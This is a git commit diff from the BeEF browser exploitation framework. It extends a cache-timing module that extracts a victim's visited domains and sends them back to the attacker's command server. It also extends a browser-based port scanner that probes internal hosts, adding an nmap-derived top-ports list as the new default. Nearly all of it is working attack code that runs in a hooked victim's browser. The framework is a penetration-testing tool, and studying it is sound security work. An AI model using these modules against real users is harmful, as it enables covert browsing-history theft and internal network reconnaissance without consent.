Merge pull request #1241 from mgeeky/master

Couple of fixes & improvements
2016-04-07 23:42:19 +10:00
parent 313d6593ca 261c9ee5aa
commit 371f27e5e1
5 changed files with 92 additions and 53 deletions
--- a/modules/browser/get_visited_domains/command.js
+++ b/modules/browser/get_visited_domains/command.js
@@ -34,7 +34,6 @@ function timer_interrupt() {
  }
 }

-
 if (beef.browser.isFF() == 1) {
 	window.addEventListener('message', timer_interrupt, false);

@@ -184,6 +183,15 @@ if (beef.browser.isO() == 1){
 	var MAX_ATTEMPTS = 1;	
 }

+/* Fetch additional targets specified by user */
+var domains = '<%= @domains %>';
+var r = new RegExp(/(\b[^,;]+\b)\s*;\s*([^$,]+)/gm);
+var res;
+
+while ((res = r.exec(domains)) != null) {
+  targets.push({'name': res[1], 'urls': res[2]});
+}
+
 function sched_call(fn) {
  exec_next = fn;
  window.postMessage('123', '*');
@@ -469,59 +477,62 @@ function visipisiCB(vp, endCB, sites, urls, site, result){
 }

 function getVisitedDomains(){
-    var tests = {
-	facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
-	twitter: 'https://twitter.com/images/spinner.gif',
-	digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
-	reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
-	hn: 'http://ycombinator.com/images/y18.gif',
-	stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
-	wired: 'http://www.wired.com/images/home/wired_logo.gif',
-	xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
-	linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
-	slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
-	myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
-	engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
-        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
-        pandora: 'http://www.pandora.com/img/logo.png',
-        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
-        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
-        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
-        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
-        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
-        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
-        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
-        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
-        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
-        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
-        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
-        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
-	walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
-	perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
-        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
-	msy: 'http://msy.com.au/images/MSYLogo-long.gif',
-	techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
-	borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
-	mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
-	anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
-	tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
-	shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
-	staticice: 'http://staticice.com.au/images/banner.jpg',
+  var tests = {
+		facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
+		twitter: 'https://twitter.com/images/spinner.gif',
+		digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
+		reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
+		hn: 'http://ycombinator.com/images/y18.gif',
+		stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
+		wired: 'http://www.wired.com/images/home/wired_logo.gif',
+		xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
+		linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
+		slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
+		myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
+		engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
+	        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
+	        pandora: 'http://www.pandora.com/img/logo.png',
+	        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
+	        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
+	        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
+	        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
+	        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
+	        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
+	        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
+	        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
+	        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
+	        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
+	        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
+	        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
+		walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
+		perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
+	        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
+		msy: 'http://msy.com.au/images/MSYLogo-long.gif',
+		techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
+		borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
+		mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
+		anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
+		tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
+		shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
+		staticice: 'http://staticice.com.au/images/banner.jpg',
  };

  var sites = [];
-  for (var k in tests)
+  for (var k in tests) {
    sites.push(k);
-   sites.reverse();
+  }
+  
+  sites.reverse();

-   vp = visipisi.webkit;
-   var first_site = sites.pop();
-   var end = function() {
-    	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
-   }
-   vp(tests[first_site], function(result) {
-	visipisiCB(vp, end, sites, tests, first_site, result);
-    });
+  vp = visipisi.webkit;
+  var first_site = sites.pop();
+  var end = function() {
+  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
+  }
+  
+  vp(tests[first_site], function(result) {
+		visipisiCB(vp, end, sites, tests, first_site, result);
+  });
 }

 function prepResult(results){
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -9,7 +9,7 @@ beef:
            enable: true
            category: "Browser"
            name: "Get Visited Domains"
-            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
+            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/\n\nYou can specify additional resources to fetch during visited domains analysis. To do so, paste to the below text field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page (mind to avoid CDN resources, as they vary). Separate domain names with url by using semicolon (;), specify next domains by separating them with comma (,)."
            authors: ["@keith55", "oxplot", "quentin"]
            target:
                working: ["FF", "IE", "O"]
--- a/modules/browser/get_visited_domains/module.rb
+++ b/modules/browser/get_visited_domains/module.rb
@@ -6,6 +6,18 @@

 class Get_visited_domains < BeEF::Core::Command

+  def self.options
+    return [{
+      'name' => 'domains', 
+      'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).', 
+      'type' => 'textarea',
+      'ui_label' => 'Specify custom page to check',
+      'value' => 'Github ; https://assets-cdn.github.com/favicon.ico,',
+      'width' => '400px',
+      'height' => '200px'
+    }]
+  end
+
  def post_execute
    content = {}
    content['results'] = @datastore['results']
--- a/modules/network/port_scanner/command.js
+++ b/modules/network/port_scanner/command.js
@@ -10,8 +10,12 @@ beef.execute(function() {
 	var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];
 	
 	var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
+	var default_services = {'1':'tcpmux', '5':'rje', '7':'echo', '9':'msn', '15':'netstat', '20':'ftp-data', '21':'ftp', '22':'ssh', '23':'telnet', '25':'smtp', '26':'rsftp', '29':'msgicp', '33':'dsp', '37':'time', '42':'nameserver', '43':'whois', '53':'domain', '67':'dhcps', '68':'dhcpc', '69':'tftp', '70':'gopher', '76':'deos', '79':'finger', '80':'http', '81':'hosts2-ns', '88':'kerberos-sec', '90':'dnsix', '98':'linuxconf', '101':'hostname', '106':'pop3pw', '109':'pop2', '110':'pop3', '111':'rpcbind', '113':'ident', '114':'audio news', '115':'sftp', '118':'sqlserv', '119':'nntp', '123':'ntp', '129':'pwdgen', '132':'cisco-sys', '133':'statsrv', '135':'msrpc', '136':'profile', '137':'netbios-ns', '138':'netbios-dgm', '139':'netbios-ssn', '143':'imap', '144':'news', '156':'sqlserv', '158':'pcmail-srv', '161':'snmp', '162':'snmp trap', '168':'rsvd', '174':'mailq', '177':'xdmcp', '194':'irc', '197':'dls', '199':'smux', '209':'tam', '213':'ipx', '217':'dbase', '219':'uarps', '220':'imap3', '223':'cdc', '264':'bgmp', '315':'dpsi', '316':'decauth', '346':'zserv', '353':'ndsauth', '389':'ldap', '413':'smsp', '414':'infoseek', '415':'bnet', '416':'silver platter', '440':'sgcp', '443':'https', '444':'snpp', '445':'microsoft-ds', '453':'creativeserver', '454':'content server', '456':'macon', '457':'scohelp', '458':'appleqtc', '462':'datasurfsrvsec', '464':'kpasswd5', '465':'smtps', '466':'digital-vrc', '480':'loadsrv', '486':'sstats', '497':'retrospect', '500':'isakmp', '501':'stmf', '515':'printer (spooler lpd)', '516':'videotex', '518':'ntalk', '522':'ulp', '523':'ibm-db2', '524':'ncp', '525':'timed', '526':'tempo', '533':'netwall', '535':'iiop', '538':'gdomap', '540':'uucp', '541':'uucp-rlogin', '542':'commerce', '543':'klogin', '544':'kshell', '545':'ekshell', '546':'dhcpconf', '547':'dhcpserv', '548':'afp', '556':'remotefs', '557':'openvms-sysipc', '560':'rmonitor', '561':'monitor', '563':'snews', '564':'9pfs', '587':'submission', '625':'apple-xsrvr-admin', '626':'apple-imap-admin', '631':'ipp', '636':'ldapssl', '637':'lanserver', '660':'mac-srvr-admin', '664':'secure-aux-bus', '666':'doom', '683':'corba-iiop', '740':'netcp', '741':'netgw', '742':'netrcs', '744':'flexlm', '747':'fujitsu-dev', '748':'ris-cm', '749':'kerberos-adm', '750':'kerberos', '751':'kerberos_master', '752':'qrh', '753':'rrh', '754':'krb_prop', '758':'nlogin', '760':'krbupdate', '761':'kpasswd', '762':'quotad', '763':'cycleserv', '764':'omserv', '765':'webster', '767':'phonebook', '771':'rtip', '773':'submit', '774':'rpasswd', '775':'entomb', '776':'wpages', '780':'wpgs', '781':'hp-collector', '782':'hp-managed-node', '783':'spam assassin', '786':'concert', '787':'qsc', '799':'controlit', '800':'mdbs_daemon', '801':'device', '808':'ccproxy-http', '871':'supfilesrv', '873':'rsync', '888':'access builder', '898':'sun-manageconsole', '901':'samba-swat', '953':'rndc', '989':'ftps-data', '990':'ftps', '992':'telnets', '993':'imaps', '994':'ircs', '995':'pop3s', '996':'xtreelic', '997':'maitrd', '998':'busboy', '999':'garcon', '1000':'cadlock', '1002':'windows-icfw', '1008':'ufsd', '1023':'netvenuechat', '1024':'kdm', '1025':'NFS-or-IIS', '1080':'socks', '1433':'mssql', '1434':'ms-sql-m', '1521 ':'oracle', '1720':'h323q931', '1723':'pptp', '3306':'mysql', '3389':'ms-wbt-server', '4489':'radmin', '5000':'upnp', '5060':'sip', '5432':'postgres', '5900':'vnc', '6000':'x11', '6001':'X11:1', '6446':'mysql-proxy', '8050':'coldfusion', '8080':'http-proxy', '8443':'tomcat', '8888':'sun-answerbook', '9100':'HP JetDirect card', '10000':'snet-sensor-mgmt', '10088':'zend server', '11371':'hkp'};

-	var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','631':'ipp','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':'ris-cm','749':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','1434':'ms-sql-m','4489':'radmin','6000':'x11','6446':'mysql-proxy','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10000':'webmin','10088':'zendserver','11371':'hkp' };
+	// Top-ports according to Fyodor's NMAP-related research (nmap-services / open-frequency).
+	//		default_services had been extended to contain below ports service names.
+	// $ cat /usr/share/nmap/nmap-services | grep -vE "^#.+" | sort -r -k3 | grep "/tcp" | sed 's:/tcp::' | grep -v unknown | awk '{print $1" - "$2}'
+	var top_ports = [80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, 135, 3306, 8080, 1723, 111, 995, 993, 5900, 1025, 587, 8888, 199, 1720, 465, 548, 113, 81, 6001, 10000, 5060, 515, 5000, 9100];
 	
 	var host = '<%= @ipHost %>';
 	// TODO: Adjust times for each browser
@@ -83,6 +87,14 @@ beef.execute(function() {
 				ports_list[i] = default_ports[i];
 			}

+		} else if (ports == 'top')	// Top-ports according to Fyodor's research
+		{
+			// nmap most used ports to scan + some new ports
+			for ( var i=0; i<top_ports.length; i++)
+			{
+				ports_list[i] = top_ports[i];
+			}
+
 		} else 
 		{ // Custom ports provided to scan
 			if (ports.search(",") > 0) ports_list = ports.split(","); // list of ports
@@ -311,7 +323,11 @@ beef.execute(function() {
 		return;
 	} else 
 	{
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning '+host+' [ports: ' + ports_list + ']');
+		desc = '';
+		if (ports == 'default' || ports == 'top') {
+			desc = ports + ' ports on ';
+		} 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning ' + desc + host+' [ports: ' + ports_list + ']');
 	}
 	
 	count = 0;
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -14,7 +14,7 @@ class Port_scanner < BeEF::Core::Command
  def self.options
    return [
        {'name' => 'ipHost', 'ui_label' => 'Scan IP or Hostname', 'value' => '192.168.1.10'},
-        {'name' => 'ports' , 'ui_label' => 'Specific port(s) to scan', 'value' => 'default'},
+        {'name' => 'ports' , 'ui_label' => 'Specific port(s) to scan', 'value' => 'top'},
        {'name' => 'closetimeout' , 'ui_label' => 'Closed port timeout (ms)', 'value' => '1100'},
        {'name' => 'opentimeout', 'ui_label' => 'Open port timeout (ms)', 'value' => '2500'},
        {'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '600'},